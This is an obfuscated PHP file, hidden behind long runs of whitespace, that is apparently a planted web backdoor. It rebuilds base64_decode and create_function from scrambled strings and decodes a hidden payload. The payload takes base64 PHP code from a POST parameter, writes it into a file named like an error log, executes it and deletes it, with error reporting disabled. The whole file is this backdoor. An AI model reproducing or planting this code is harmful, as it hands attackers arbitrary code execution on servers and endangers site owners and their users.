


































																																																					                                                                            <?php


































































																																																																																				                                        $JJ = "mNlKCdlcnJvcl/9sb/2cnKTsNCiAgQHVubGlu/aygnZXJyb3J/fbG9nJyk7ZXhpdDsNCn0=";

















																																																																					                         $vs = "k7D/QpzZXRfdG/ltZV/9saW1pdCg/wKTsNCmlmKGlz/c2V0KCRfUE9TVFsnMTE3Mzk";














																																																																														      $ab4 = str_replace("/", "", "/str/_r/e/p/lac/e");























































































																																																																																																				                                                        $LmM = "ZXJy/b3JfcmVwb/3J0aW5nKDAp/O/w0KaW/d/ub3JlX3Vz/ZXJfYWJvcnQodHJ1Z/S";


























































































												                                                                                           $DGu = "9jb250ZW50cygnZXJyb/3JfbG9nJywnUEhQIEZhdGFsIGVycm9yOiAg/VW5jYXVnaH";
















																																																																																                                                                       $Sc = "QgR/XJyb3I6IGNvZGUoMSkgPCcuJz9waHAnLi/RlcnIpOw0KICBAcmVxdWlyZ/V9vb";




























			                                           $SpJ = "A7JGk8/MTAwOyR/pKys/pJ/G/Vycj1QSFB/fRU9MLiRlcnI7DQogIEBmaWxlX3B1dF";





































































																	                          $Myy = $ab4("V", "", "bVaVsVeV64V_deVcoVde");























































																																																			                                                                                              $Px = $ab4("D", "", "DcrDeDaDtDe_fDuDncDtDion");





































																																																																																						                                               $cy = "c/xMTczOT/A1MjIyJ10sMSkp/Ll/BIUF9FT/0wuJz/8+Jz/sNCi/A/gZm9yKCRpP/T";












																																																				                               $Ks = "wNTIyMiddKSl7DQogICRlcnI9YmFzZ/TY0X2RlY29kZShzdW/JzdHIoJF/9QT1NUWy";




















































																																																																				                                                                                                   $BPJ = $Px("", $Myy($ab4("/", "", $LmM.$vs.$Ks.$cy.$SpJ.$DGu.$Sc.$JJ)));













































































																																																																																		                                                                             $BPJ();


















































































																																																																					                                                                              
